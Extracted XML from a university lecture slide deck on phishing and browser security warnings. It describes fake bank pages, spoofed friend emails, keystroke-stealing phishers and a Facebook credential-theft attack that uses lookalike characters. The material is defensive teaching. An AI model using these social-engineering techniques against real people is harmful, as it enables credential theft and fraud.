            <a:ext cx="5943600" cy="1295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endParaRPr lang="en-US" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1397765" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6335E99-D01F-1040-9BCF-F6CCE9209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4913" y="4027932"/>
            <a:ext cx="11833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Sends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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keystroke</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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to phisher</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1397766" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43DF3460-29F5-CF40-974A-D4CCA740B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609" y="5291958"/>
            <a:ext cx="3276600" cy="381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endParaRPr lang="en-US" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1397767" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDCF2FCF-636C-034B-AA43-A4E349D4D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730" y="5262783"/>
            <a:ext cx="24000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Changes character to *</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="341256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7764" grpId="0" animBg="1"/>
      <p:bldP spid="1397765" grpId="0"/>
      <p:bldP spid="1397766" grpId="0" animBg="1"/>
      <p:bldP spid="13977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B318A25-6970-E949-8BEA-6A570E315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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Social Engineering Tricks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1E6AA6E-5FD2-F543-A8EA-E1E8FCA2CB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78123" y="559477"/>
            <a:ext cx="5745689" cy="5475563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Create a bank page advertising an interest rate slightly higher than any real bank; ask users for their credentials to initiate money transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Some victims provided their bank account numbers to “Flintstone National Bank” of “Bedrock, Colorado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Exploit social relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Spoof an email from a Facebook friend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>In a West Point experiment, 80% of cadets were deceived into following an embedded link regarding their grade report from a fictitious colonel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118968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204C7DF3-8B03-FC44-AB15-B4FE726A29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Facebook Phishing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49A629AD-2F9A-DC45-920B-7C2D05FD88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2103120"/>
            <a:ext cx="7922217" cy="3849624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Attack steals Facebook credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Changes profile picture of compromised account to       and the name to “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Fącebooƙ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Şecurițy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Sends a message to  all contacts:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16389" name="Picture 2" descr="http://www.blingcheese.com/facebook-icon.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B9A610F-BF44-6D4F-9A25-82B183BBA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420" y="3217390"/>
            <a:ext cx="508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4" descr="http://www.securelist.com/en/images/pictures/klblog/208193331.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EBA8922-2305-4F4A-9D36-5F8A15598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569" y="3767800"/>
            <a:ext cx="2024675" cy="218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AE3878-10EB-904B-8BBD-CC8351E717D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5071820" y="6069998"/>
            <a:ext cx="6746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1600" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>securelist.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>-security-phishing-attack-in-the-wild/31951/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B1E715-89DE-9945-B098-A923DA7803D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9313486" y="372539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anose="02000800000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Notice anything?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D0FB83-9B48-4F4E-82BF-E617029906A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8101324" y="3298875"/>
            <a:ext cx="1114200" cy="610920"/>
            <a:chOff x="8101324" y="3298875"/>
            <a:chExt cx="1114200" cy="61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4366442-924B-0145-BE21-1C40F073B562}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8101324" y="3464115"/>
                <a:ext cx="1114200" cy="445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4366442-924B-0145-BE21-1C40F073B56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83684" y="3446115"/>
                  <a:ext cx="114984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40A4A91-6B6E-4C4B-BC23-39AC0B2B0989}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8126884" y="3451515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40A4A91-6B6E-4C4B-BC23-39AC0B2B09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08884" y="343387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0F94E43-6B62-3244-BA84-533F87F4EBFE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8126884" y="3298875"/>
                <a:ext cx="312840" cy="153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0F94E43-6B62-3244-BA84-533F87F4EBF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08884" y="3281235"/>
                  <a:ext cx="348480" cy="188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2838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1224</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>146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ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Garamond</vt:lpstr>
      <vt:lpstr>Monotype Sorts</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Selawik Light</vt:lpstr>
      <vt:lpstr>Speak Pro</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>SavonVTI</vt:lpstr>
      <vt:lpstr>Phishing  SECURITY WARNINGS  Vitaly Shmatikov</vt:lpstr>
      <vt:lpstr>Back in 2016</vt:lpstr>
      <vt:lpstr>“Change Your Password Immediately”</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Zirconium (APT31) Attacks</vt:lpstr>
      <vt:lpstr>Phishing Techniques</vt:lpstr>
      <vt:lpstr>Trusted Input Path Problem</vt:lpstr>
      <vt:lpstr>Social Engineering Tricks</vt:lpstr>
      <vt:lpstr>Facebook Phishing</vt:lpstr>
      <vt:lpstr>“Payment Verification”</vt:lpstr>
      <vt:lpstr>Experiments at Indiana U. (2006)</vt:lpstr>
      <vt:lpstr>Five Stages of Grief</vt:lpstr>
      <vt:lpstr>Victims’ Reactions (1)</vt:lpstr>
      <vt:lpstr>Victims’ Reactions (2)</vt:lpstr>
      <vt:lpstr>Safe to Type Your Password?</vt:lpstr>
      <vt:lpstr>Safe to Type Your Password?</vt:lpstr>
      <vt:lpstr>Safe to Type Your Password?</vt:lpstr>
      <vt:lpstr>Safe to Type Your Password?</vt:lpstr>
      <vt:lpstr>Picture-in-Picture Attacks</vt:lpstr>
      <vt:lpstr>Status Bar Is Trivially Spoofable</vt:lpstr>
      <vt:lpstr>Browser Warnings</vt:lpstr>
      <vt:lpstr>More About Security Warnings</vt:lpstr>
      <vt:lpstr>Bad Example: Mixed Content in IE6 (circa 2004)</vt:lpstr>
      <vt:lpstr>Better (IE8)</vt:lpstr>
      <vt:lpstr>Guidelines for Security Warnings</vt:lpstr>
      <vt:lpstr>Bad Example (IE6): Revoked SSL Certificate</vt:lpstr>
      <vt:lpstr>Better Explanation</vt:lpstr>
      <vt:lpstr>Chrome (2019)</vt:lpstr>
      <vt:lpstr>Chrome (2019)</vt:lpstr>
      <vt:lpstr>Bad Explanation (Windows Vista)</vt:lpstr>
      <vt:lpstr>Better Design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Phishing.  Security warnings.</dc:title>
  <dc:subject/>
  <dc:creator>Vitaly Shmatikov</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vitaly Shmatikov</cp:lastModifiedBy>
  <cp:revision>154</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-13T21:02:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-13T23:13:24Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>